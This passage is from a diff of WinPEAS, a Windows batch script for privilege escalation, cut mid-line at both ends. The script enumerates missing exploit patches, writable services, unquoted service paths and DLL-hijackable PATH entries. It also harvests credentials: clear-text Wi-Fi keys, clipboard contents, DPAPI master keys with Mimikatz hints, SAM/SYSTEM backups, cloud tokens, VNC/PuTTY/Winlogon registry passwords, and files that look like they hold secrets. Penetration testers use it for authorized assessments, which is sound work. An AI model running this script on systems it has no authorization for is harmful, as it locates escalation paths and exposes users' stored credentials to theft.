INTERFACES" -ipconfig /all -ECHO. -CALL :T_Progress 1 - -:NetworkUsedPorts -CALL :ColorLine " %E%33m[+]%E%97m USED PORTS" -ECHO. [i] Check for services restricted from the outside -netstat -ano | findstr /i listen -ECHO. -CALL :T_Progress 1 - -:NetworkFirewall -CALL :ColorLine " %E%33m[+]%E%97m FIREWALL" -netsh firewall show state -netsh firewall show config -ECHO. -CALL :T_Progress 2 - -:ARP -CALL :ColorLine " %E%33m[+]%E%97m ARP" -arp -A -ECHO. -CALL :T_Progress 1 - -:NetworkRoutes -CALL :ColorLine " %E%33m[+]%E%97m ROUTES" -route print -ECHO. -CALL :T_Progress 1 - -:WindowsHostsFile -CALL :ColorLine " %E%33m[+]%E%97m Hosts file" -type C:\WINDOWS\System32\drivers\etc\hosts | findstr /v "^#" -CALL :T_Progress 1 - -:DNSCache -CALL :ColorLine " %E%33m[+]%E%97m DNS CACHE" -ipconfig /displaydns | findstr "Record" | findstr "Name Host" -ECHO. -CALL :T_Progress 1 - -:WifiCreds -CALL :ColorLine " %E%33m[+]%E%97m WIFI" -for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.) -CALL :T_Progress 1 - -:BasicUserInfo -CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO -ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups -ECHO. -CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER" -net user %username% -net user %USERNAME% /domain 2>nul -whoami /all -ECHO. -CALL :T_Progress 2 - -:BasicUserInfoUsers -CALL :ColorLine " %E%33m[+]%E%97m USERS" -net user -ECHO. -CALL :T_Progress 1 - -:BasicUserInfoGroups -CALL :ColorLine " %E%33m[+]%E%97m GROUPS" -net localgroup -ECHO. -CALL :T_Progress 1 - -:BasicUserInfoAdminGroups -CALL :ColorLine " %E%33m[+]%E%97m ADMINISTRATORS GROUPS" -REM seems to be localised -net localgroup Administrators 2>nul -net localgroup Administradores 2>nul -ECHO. -CALL :T_Progress 1 - -:BasicUserInfoLoggedUser -CALL :ColorLine " %E%33m[+]%E%97m CURRENT LOGGED USERS" -quser -ECHO. -CALL :T_Progress 1 - -:KerberosTickets -CALL :ColorLine " %E%33m[+]%E%97m Kerberos Tickets" -klist -ECHO. -CALL :T_Progress 1 - -:CurrentClipboard -CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD" -ECHO. [i] Any password inside the clipboard? -powershell -command "Get-Clipboard" 2>nul -ECHO. -CALL :T_Progress 1 - -:ServiceVulnerabilities -CALL :ColorLine "%E%32m[*]%E%97m SERVICE VULNERABILITIES" -:::sysinternals external tool -::ECHO. -::CALL :ColorLine " %E%33m[+]%E%97m SERVICE PERMISSIONS WITH accesschk.exe FOR 'Authenticated users', Everyone, BUILTIN\Users, Todos and CURRENT USER" -::ECHO. [i] If Authenticated Users have SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG or WRITE_DAC or WRITE_OWNER or GENERIC_WRITE or GENERIC_ALL, you can modify the binary that is going to be executed by the service and start/stop the service -::ECHO. [i] If accesschk.exe is not in PATH, nothing will be found here -::ECHO. [i] AUTHETICATED USERS -::accesschk.exe -uwcqv "Authenticated Users" * /accepteula 2>nul -::ECHO. [i] EVERYONE -::accesschk.exe -uwcqv "Everyone" * /accepteula 2>nul -::ECHO. [i] BUILTIN\Users -::accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul -::ECHO. [i] TODOS -::accesschk.exe -uwcqv "Todos" * /accepteula 2>nul -::ECHO. [i] %USERNAME% -::accesschk.exe -uwcqv %username% * /accepteula 2>nul -::ECHO. -::CALL :ColorLine " %E%33m[+]%E%97m SERVICE PERMISSIONS WITH accesschk.exe FOR *" -::ECHO. [i] Check for weird service permissions for unexpected groups" -::accesschk.exe -uwcqv * /accepteula 2>nul -CALL :T_Progress 1 -ECHO. - -:ServiceBinaryPermissions -CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS" -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services -for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do ( - for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO. -) -ECHO. -CALL :T_Progress 1 - -:CheckRegistryModificationAbilities -CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY" -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services -for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a -ECHO. -CALL :T_Progress 1 - -:UnquotedServicePaths -CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS" -ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe' -ECHO. [i] The permissions are also checked and filtered using icacls -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services -for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( - for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do ( - ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO. - ) -) -CALL :T_Progress 2 -::wmic service get name,displayname,pathname,startmode | more | findstr /i /v "C:\\Windows\\system32\\" | findstr /i /v """ -ECHO. -::CALL :T_Progress 1 - -:PATHenvHijacking -CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable" -ECHO. [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations -ECHO. [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking -for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. ) -ECHO. -CALL :T_Progress 1 - -:WindowsCredentials -CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS" -ECHO. -CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT" -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault -cmdkey /list -ECHO. -CALL :T_Progress 2 - -:DPAPIMasterKeys -CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS" -ECHO. [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi -powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul -powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul -CALL :T_Progress 2 -CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS" -ECHO. [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt -ECHO. [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi -ECHO. -ECHO.Looking inside %appdata%\Microsoft\Credentials\ -ECHO. -dir /b/a %appdata%\Microsoft\Credentials\ 2>nul -CALL :T_Progress 2 -ECHO. -ECHO.Looking inside %localappdata%\Microsoft\Credentials\ -ECHO. -dir /b/a %localappdata%\Microsoft\Credentials\ 2>nul -CALL :T_Progress 2 -ECHO. - -:UnattendedFiles -CALL :ColorLine " %E%33m[+]%E%97m Unattended files" -IF EXIST %WINDIR%\sysprep\sysprep.xml ECHO.%WINDIR%\sysprep\sysprep.xml exists. -IF EXIST %WINDIR%\sysprep\sysprep.inf ECHO.%WINDIR%\sysprep\sysprep.inf exists. -IF EXIST %WINDIR%\sysprep.inf ECHO.%WINDIR%\sysprep.inf exists. -IF EXIST %WINDIR%\Panther\Unattended.xml ECHO.%WINDIR%\Panther\Unattended.xml exists. -IF EXIST %WINDIR%\Panther\Unattend.xml ECHO.%WINDIR%\Panther\Unattend.xml exists. -IF EXIST %WINDIR%\Panther\Unattend\Unattend.xml ECHO.%WINDIR%\Panther\Unattend\Unattend.xml exists. -IF EXIST %WINDIR%\Panther\Unattend\Unattended.xml ECHO.%WINDIR%\Panther\Unattend\Unattended.xml exists. -IF EXIST %WINDIR%\System32\Sysprep\unattend.xml ECHO.%WINDIR%\System32\Sysprep\unattend.xml exists. -IF EXIST %WINDIR%\System32\Sysprep\unattended.xml ECHO.%WINDIR%\System32\Sysprep\unattended.xml exists. -IF EXIST %WINDIR%\..\unattend.txt ECHO.%WINDIR%\..\unattend.txt exists. -IF EXIST %WINDIR%\..\unattend.inf ECHO.%WINDIR%\..\unattend.inf exists. -ECHO. -CALL :T_Progress 2 - -:SAMSYSBackups -CALL :ColorLine " %E%33m[+]%E%97m SAM and SYSTEM backups" -IF EXIST %WINDIR%\repair\SAM ECHO.%WINDIR%\repair\SAM exists. -IF EXIST %WINDIR%\System32\config\RegBack\SAM ECHO.%WINDIR%\System32\config\RegBack\SAM exists. -IF EXIST %WINDIR%\System32\config\SAM ECHO.%WINDIR%\System32\config\SAM exists. -IF EXIST %WINDIR%\repair\SYSTEM ECHO.%WINDIR%\repair\SYSTEM exists. -IF EXIST %WINDIR%\System32\config\SYSTEM ECHO.%WINDIR%\System32\config\SYSTEM exists. -IF EXIST %WINDIR%\System32\config\RegBack\SYSTEM ECHO.%WINDIR%\System32\config\RegBack\SYSTEM exists. -ECHO. -CALL :T_Progress 3 - -:McAffeeSitelist -CALL :ColorLine " %E%33m[+]%E%97m McAffee SiteList.xml" -cd %ProgramFiles% 2>nul -dir /s SiteList.xml 2>nul -cd %ProgramFiles(x86)% 2>nul -dir /s SiteList.xml 2>nul -cd "%windir%\..\Documents and Settings" 2>nul -dir /s SiteList.xml 2>nul -cd %windir%\..\Users 2>nul -dir /s SiteList.xml 2>nul -ECHO. -CALL :T_Progress 2 - -:GPPPassword -CALL :ColorLine " %E%33m[+]%E%97m GPP Password" -cd "%SystemDrive%\Microsoft\Group Policy\history" 2>nul -dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 2>nul -cd "%windir%\..\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history" 2>nul -dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 2>nul -ECHO. -CALL :T_Progress 2 - -:CloudCreds -CALL :ColorLine " %E%33m[+]%E%97m Cloud Credentials" -cd "%SystemDrive%\Users" -dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 2>nul -cd "%windir%\..\Documents and Settings" -dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 2>nul -ECHO. -CALL :T_Progress 2 - -:AppCMD -CALL :ColorLine " %E%33m[+]%E%97m AppCmd" -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe -IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists. -ECHO. -CALL :T_Progress 2 - -:RegFilesCredentials -CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials" -ECHO. [i] Searching specific files that may contains credentials. -ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files -ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password -reg query HKCU\Software\ORL\WinVNC3\Password 2>nul -CALL :T_Progress 2 -ECHO.Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password -reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password 2>nul -CALL :T_Progress 2 -ECHO.Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon -reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername" -CALL :T_Progress 2 -ECHO.Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP -reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s 2>nul -CALL :T_Progress 2 -ECHO.Looking inside HKCU\Software\TightVNC\Server -reg query HKCU\Software\TightVNC\Server 2>nul -CALL :T_Progress 2 -ECHO.Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions -reg query HKCU\Software\SimonTatham\PuTTY\Sessions /s 2>nul -CALL :T_Progress 2 -ECHO.Looking inside HKCU\Software\OpenSSH\Agent\Keys -CALL :T_Progress 2 -reg query HKCU\Software\OpenSSH\Agent\Keys /s 2>nul -cd %USERPROFILE% 2>nul && dir /s/b *password* == *credential* 2>nul -cd ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\.. -dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2>nul | findstr /v ".dll" -cd inetpub 2>nul && (dir /s/b web.config == *.log & cd ..) -ECHO. -CALL :T_Progress 2 - -:ExtendedDriveScan -if "%long%" == "true" ( - CALL :ColorLine " %E%33m[+]%E%97m REGISTRY WITH STRING pass OR pwd" - reg query HKLM /f passw /t REG_SZ /s - reg query HKCU /f passw /t REG_SZ /s - reg query HKLM /f pwd /t REG_SZ /s - reg query HKCU /f pwd /t REG_SZ /s - ECHO. - ECHO. [i] Iterating through the drives - ECHO. - for /f %%x in ('wmic logicaldisk get name^| more') do ( - set tdrive=%%x - if "!tdrive:~1,2!" == ":" ( - %%x - CALL :ColorLine " %E%33m[+]%E%97m FILES THAT CONTAINS THE WORD PASSWORD WITH EXTENSION: .xml .ini .txt *.cfg *.config" - findstr /s/n/m/i password *.xml *.ini *.txt *.cfg *.config 2>nul | findstr /v /i "\\AppData\\Local \\WinSxS ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.Cloud \\Notepad\+\+\\ vmware cortana alphabet \\7-zip\\" 2>nul - ECHO. - CALL :ColorLine " %E%33m[+]%E%97m FILES WHOSE NAME CONTAINS THE WORD PASS CRED or .config not inside \Windows\" - dir /s/b *pass* == *cred* == *.config* == *.cfg 2>nul | findstr /v /i "\\windows\\" - ECHO. - ) - ) - CALL :T_Progress 2 -) ELSE ( - CALL :T_Progress 2 -) -TITLE WinPEAS - Windows local Privilege Escalation Awesome Script - Idle -ECHO.--- -ECHO.Scan complete. -PAUSE >NUL -EXIT /B - -:::-Subroutines - -:SetOnce -REM :: ANSI escape character is set once below - for ColorLine Subroutine -SET "E=0x1B[" -SET "PercentageTrack=0" -EXIT /B - -:T_Progress -SET "Percentage=%~1" -SET /A "PercentageTrack=PercentageTrack+Percentage" -TITLE WinPEAS - Windows local Privilege Escalation Awesome Script - Scanning... !PercentageTrack!%% -EXIT /B - -:ColorLine -SET "CurrentLine=%~1" -FOR /F "delims=" %%A IN ('FORFILES.EXE /P %~dp0 /M %~nx0 /C "CMD /C ECHO.!CurrentLine!"') DO ECHO.%%A -EXIT /B +@ECHO OFF & SETLOCAL EnableDelayedExpansion +TITLE WinPEAS - Windows local Privilege Escalation Awesome Script +COLOR 0F +CALL :SetOnce + +REM :: WinPEAS - Windows local Privilege Escalation Awesome Script +REM :: Code by carlospolop; Re-Write by ThisLimn0 + +REM Registry scan of other drives besides +REM /////true or false +SET long=false + +:Splash +ECHO. +CALL :ColorLine " %E%32m((,.,/((((((((((((((((((((/, */%E%97m" +CALL :ColorLine " %E%32m,/*,..*(((((((((((((((((((((((((((((((((,%E%97m" +CALL :ColorLine " %E%32m,*/((((((((((((((((((/, %E%92m.*//((//**,%E%32m .*((((((*%E%97m" +CALL :ColorLine " %E%32m((((((((((((((((* %E%94m*****%E%32m,,,/########## %E%32m.(* ,((((((%E%97m" +CALL :ColorLine " %E%32m(((((((((((/* %E%94m******************%E%32m/####### %E%32m.(. ((((((%E%97m" +CALL :ColorLine " %E%32m((((((.%E%92m.%E%94m******************%E%97m/@@@@@/%E%94m***%E%92m/######%E%32m /((((((%E%97m" +CALL :ColorLine " %E%32m,,.%E%92m.%E%94m**********************%E%97m@@@@@@@@@@(%E%94m***%E%92m,####%E%32m ../(((((%E%97m" +CALL :ColorLine " %E%32m, ,%E%92m%E%94m**********************%E%97m#@@@@@#@@@@%E%94m*********%E%92m##%E%32m((/ /((((%E%97m" +CALL :ColorLine " %E%32m..((%E%92m(##########%E%94m*********%E%97m/#@@@@@@@@@/%E%94m*************%E%32m,,..((((%E%97m" +CALL :ColorLine " %E%32m.((%E%92m(################(/%E%94m******%E%97m/@@@@@#%E%94m****************%E%32m.. /((%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(########################(/%E%94m************************%E%32m..*(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(#############################(/%E%94m********************%E%32m.,(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(##################################(/%E%94m***************%E%32m..(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(######################################(%E%94m************%E%32m..(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(######(,.***.,(###################(..***(/%E%94m*********%E%32m..(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(######*(#####((##################((######/(%E%94m********%E%32m..(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(##################(/**********(################(%E%94m**%E%32m...(%E%97m" +CALL :ColorLine " %E%32m.((%E%92m(####################/*******(###################%E%32m.((((%E%97m" +CALL :ColorLine " %E%32m.((((%E%92m(############################################/%E%32m /((%E%97m" +CALL :ColorLine " %E%32m..((((%E%92m(#########################################(%E%32m..(((((.%E%97m" +CALL :ColorLine " %E%32m....((((%E%92m(#####################################(%E%32m .((((((.%E%97m" +CALL :ColorLine " %E%32m......((((%E%92m(#################################(%E%32m .(((((((.%E%97m" +CALL :ColorLine " %E%32m(((((((((. ,%E%92m(############################(%E%32m../(((((((((.%E%97m" +CALL :ColorLine " %E%32m(((((((((/, %E%92m,####################(%E%32m/..((((((((((.%E%97m" +CALL :ColorLine " %E%32m(((((((((/,. %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m" +CALL :ColorLine " %E%32m(((((((((((((((((((((((((((/%E%97m" +ECHO. by carlospolop +ECHO. +ECHO. + +:Advisory +REM // Increase progress in title by n percent +CALL :T_Progress 0 +ECHO./^^!\ Advisory: WinPEAS - Windows local Privilege Escalation Awesome Script +CALL :ColorLine " %E%41mWinPEAS should be used for authorized penetration testing and/or educational purposes only.%E%40;97m" +CALL :ColorLine " %E%41mAny misuse of this software will not be the responsibility of the author or of any other collaborator.%E%40;97m" +CALL :ColorLine " %E%41mUse it at your own networks and/or with the network owner's permission.%E%40;97m" +ECHO. + +:SystemInfo +CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO +CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS" +ECHO. [i] Check for vulnerabilities for the OS version with the applied patches +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits +systeminfo +ECHO. +CALL :T_Progress 2 + +:ListHotFixes +wmic qfe get Caption,Description,HotFixID,InstalledOn | more +set expl=no +for /f "tokens=3-9" %%a in ('systeminfo') do (ECHO."%%a %%b %%c %%d %%e %%f %%g" | findstr /i "2000 XP 2003 2008 vista" && set expl=yes) & (ECHO."%%a %%b %%c %%d %%e %%f %%g" | findstr /i /C:"windows 7" && set expl=yes) +IF "%expl%" == "yes" ECHO. [i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2592799" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS11-080 patch is NOT installed! (Vulns: XP/SP3,2K3/SP3-afd.sys) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3143141" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS16-032 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS11-011 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB982799" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-59 patch is NOT installed! (Vulns: 2K8,Vista,7/SP0-Chimichurri) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979683" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-21 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2305420" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-092 patch is NOT installed! (Vulns: 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB981957" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-073 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4013081" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS17-017 patch is NOT installed! (Vulns: 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB977165" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-015 patch is NOT installed! (Vulns: 2K,XP,2K3,2K8,Vista,7-User Mode to Ring) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB941693" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS08-025 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB920958" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS06-049 patch is NOT installed! (Vulns: 2K/SP4-ZwQuerySysInfo) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB914389" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS06-030 patch is NOT installed! (Vulns: 2K,XP/SP2-Mrxsmb.sys) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB908523" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS05-055 patch is NOT installed! (Vulns: 2K/SP4-APC Data-Free) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB890859" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS05-018 patch is NOT installed! (Vulns: 2K/SP3/4,XP/SP1/2-CSRSS) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB842526" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-019 patch is NOT installed! (Vulns: 2K/SP2/3/4-Utility Manager) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB835732" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-011 patch is NOT installed! (Vulns: 2K/SP2/3/4,XP/SP0/1-LSASS service BoF) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB841872" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-020 patch is NOT installed! (Vulns: 2K/SP4-POSIX) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2975684" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS14-040 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS16-016 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3057191" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS15-051 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2989935" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS14-070 patch is NOT installed! (Vulns: 2K3/SP2-TCP/IP) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2778930" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-005 patch is NOT installed! (Vulns: Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2850851" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-053 patch is NOT installed! (Vulns: 7SP0/SP1_x86-schlamperei) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2870008" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-081 patch is NOT installed! (Vulns: 7SP0/SP1_x86-track_popup_menu) +ECHO. +CALL :T_Progress 2 + +:DateAndTime +CALL :ColorLine " %E%33m[+]%E%97m DATE and TIME" +ECHO. [i] You may need to adjust your local date/time to exploit some vulnerability +date /T +time /T +ECHO. +CALL :T_Progress 2 + +:AuditSettings +CALL :ColorLine " %E%33m[+]%E%97m Audit Settings" +ECHO. [i] Check what is being logged +REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit 2>nul +ECHO. +CALL :T_Progress 1 + +:WEFSettings +CALL :ColorLine " %E%33m[+]%E%97m WEF Settings" +ECHO. [i] Check where are being sent the logs +REG QUERY HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager 2>nul +ECHO. +CALL :T_Progress 1 + +:LAPSInstallCheck +CALL :ColorLine " %E%33m[+]%E%97m LAPS installed?" +ECHO. [i] Check what is being logged +REG QUERY "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled 2>nul +ECHO. +CALL :T_Progress 1 + +:LSAProtectionCheck +CALL 